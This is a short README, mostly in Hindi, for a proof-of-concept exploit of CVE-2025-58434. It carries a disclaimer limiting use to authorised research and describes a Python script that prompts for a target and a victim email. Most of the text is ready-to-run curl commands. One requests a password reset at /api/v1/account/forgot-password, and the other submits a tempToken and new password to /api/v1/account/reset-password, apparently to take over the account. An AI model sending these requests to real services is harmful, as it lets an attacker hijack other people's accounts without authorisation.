
CVE-2025-58434 Proof of Concept
Python प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट POST /api/v1/account/forgot-password को ट्रिगर करने के लिए।
⚠️ केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए। इस उपकरण को उन सिस्टमों के विरुद्ध चलाना जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति नहीं है, अवैध है।
zaddy6 (Isaac David)arthurgervais (Arthur Gervais)CVE-2025-58434 के लिए PoCpoc.py: मशीन URL/IP, बेयर होस्ट/IP उपयोग करने पर वैकल्पिक प्रोटोकॉल, लक्ष्य ईमेल और पासवर्ड के लिए संकेत देता है; फिर अनुरोध भेजता है और curl -i के समान HTTP स्थिति, हेडर और प्रतिक्रिया बॉडी प्रिंट करता है।चलाएँ:
python3 poc.py
फिर प्रदान करें:
10.10.11.10, http://10.10.11.10, या https://target.examplecurl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"<[email protected]>"}}'
curl -i -X POST https://<target>/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{
"user":{
"email":"<[email protected]>",
"tempToken":"<tempToken>",
"password":"NewSecurePassword123!"
}
}'